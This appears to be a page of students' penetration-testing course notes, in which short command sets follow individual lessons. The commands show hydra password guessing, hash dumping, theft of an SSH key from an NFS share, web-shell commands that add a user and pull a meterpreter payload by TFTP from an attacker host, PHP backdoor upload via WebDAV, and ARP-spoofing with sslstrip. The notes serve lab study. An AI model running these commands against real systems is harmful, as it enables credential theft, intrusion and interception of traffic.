Advanced Penetration Testing Notes

Syntax Error

As IPv6 syntax will be used by default, try /router_add// /target_add//; use / address //

By: PRATEEK | Related Lesson: Traffic Capture (part 5) ettercap | Modified: May 17, 2017

Session metasploit

sessions -l  Lists the sessions opened previously (background sessions); usually a session runs in the background after pressing Ctrl+Z. To get back into the session we can do sessions -i <session ID>

By: praveenAgent47 | Related Lesson: Metasploit (part 3) Operation | Modified: May 17, 2017

python

connect vs connect_ex

By: suhailmt | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: May 17, 2017

Offline Password Attacks

nano windowshashes.txt

By: rspeight10 | Related Lesson: Passwords (part 3) Offline Password Attacks | Modified: May 16, 2017

Online Password Hacking

hydra -l <username> -p <password> -L (list of names) -P (list of passwords)
hydra -l Georgia -P passwords.txt 192.168.1.76 ftp

By: rspeight10 | Related Lesson: Passwords (part 2) Online Password Cracking | Modified: May 16, 2017

Password Attacks

meterpreter > hashdump
bkhive system syskey.txt
samdump2 sam syskey.txt

By: rspeight10 | Related Lesson: Passwords (part 1) Password Attacks | Modified: May 16, 2017

Attaching to an IP

Network file system
showmount -e <ip-address>
mkdir /tmp/georgia
mount -t nfs -o nolock 192.168.1.80:/excport/Georgia /tmp/georgia
cd /tmp/georgia
ls -a (shows hidden directories)
cat authorized_keys
cp id_rsa /root/.ssh/id_rsa
apt-get install

By: rspeight10 | Related Lesson: Exploitation (part 6) Attaching to an IP Address | Modified: May 16, 2017

SQL Commands

192.168.1.76/phpmyadmin (you have access to MySQL DB)
192.168.1.76/shell.php?cmd
net user james Georgia /add
atftpd --daemon --bind-address 192.168.1.77 /tmp
netstat -antp
192.168.1.76/shell.php?cmd=tftp 192.168.1.77 get meterpreter.php c:\

By: rspeight10 | Related Lesson: Exploitation (part 2) SQL Commands | Modified: May 16, 2017

Direct Exploitation

cadaver http://192.168.1.76/webdev
wampp xampp
nano test.txt
make sure you can upload files
192.168.1.76/webdev/test.txt
192.168.1.76/xampp/splash.php
/usr/share/webshells
cd php
simple-backdoor.php
/usr/share/webshells/php> cadaver http://192.168.

By: rspeight10 | Related Lesson: Exploitation (part 1) Direct Exploitation | Modified: May 16, 2017

SSL Stripping

SSL Man in the Middle (arpspoof the IP address)
enable arpspoofing
arpspoof -i eth0 -t 192.168.1.23 192.168.1.1
enable iptables rules
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080

By: rspeight10 | Related Lesson: Traffic Capture (part 6) SSL Stripping | Modified: May 16, 2017
